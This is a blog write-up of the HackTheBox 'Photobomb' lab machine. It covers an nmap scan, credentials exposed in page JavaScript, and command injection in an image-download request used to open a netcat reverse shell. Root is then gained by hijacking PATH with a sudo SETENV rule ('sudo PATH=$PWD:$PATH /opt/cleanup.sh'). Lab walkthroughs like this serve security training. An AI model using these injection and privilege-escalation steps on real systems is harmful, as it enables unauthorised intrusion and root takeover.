Home photobomb Photobomb | HackTheBox | Machine
Post
Cancel

photobomb Photobomb | HackTheBox | Machine


photobomb

Enumeration

Nmap

1
nmap -sV -sC <target ip>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 10:47 EST
Nmap scan report for 10.10.11.182
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.36 seconds

Let’s see port 80

80

and by inspecting and by looking into source code of the page we found photobomb.js

view page source

Let’s see what’s there in the photobomb.js

pass-link

we got the special url that is http://pH0t0:b0Mb!@photobomb.htb/printer

now we logged in as pH0t0

download image

we can see that we can download the images! let’s intercept that using burpsuite!

burp-intercept--download

By looking at the intercepted request we can see that we can we can take leverage of injection functionality here!

try with the reverse shell ! visit here to generate reverseshell https://revshells.com/

payload

It’s importent to encode the payload to urlencode

encode-payload

Β  Β 

shell-getting-burp

we got a reverse shell!

1
2
3
4
5
6
7
8
9
10
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.182
wizard@photobomb:~/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
wizard@photobomb:~/photobomb$ hostname -I
10.10.11.182 dead:beef::250:56ff:feb9:240a 
wizard@photobomb:~/photobomb$ cat ../user.txt 
c00**************************1d8
wizard@photobomb:~/photobomb$

Privilege Escalation

By looking at the sudoers we can see that we can run a script, but we also have the ability to set environment variables

1
2
3
4
5
6
7
wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
    secure_path=/usr/local/bin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$

Looking at the script we can see that it uses find relatively and not the absolute path

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
wizard@photobomb:~$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
wizard@photobomb:~$

We can take advantage of the fact that we can change variables like the path so that it takes us a custom find command, and in the context of sudo our find will run as root

Congragulations!

this is the command that gives you the root privileges sudo PATH=$PWD:$PATH /opt/cleanup.sh

1
2
3
4
5
6
7
8
wizard@photobomb:~$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:~# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:~# hostname -I
10.10.11.182 dead:beef::250:56ff:feb9:240a 
root@photobomb:~# cat /root/root.txt 
344**************************a18
root@photobomb:~#
This post is licensed under CC BY 4.0 by the author.

front-page port 80-shoopyu Illumination | HackTheBox | Forensics Challange

front-page port 80-shoopyu Recommended Books to begin with! | Books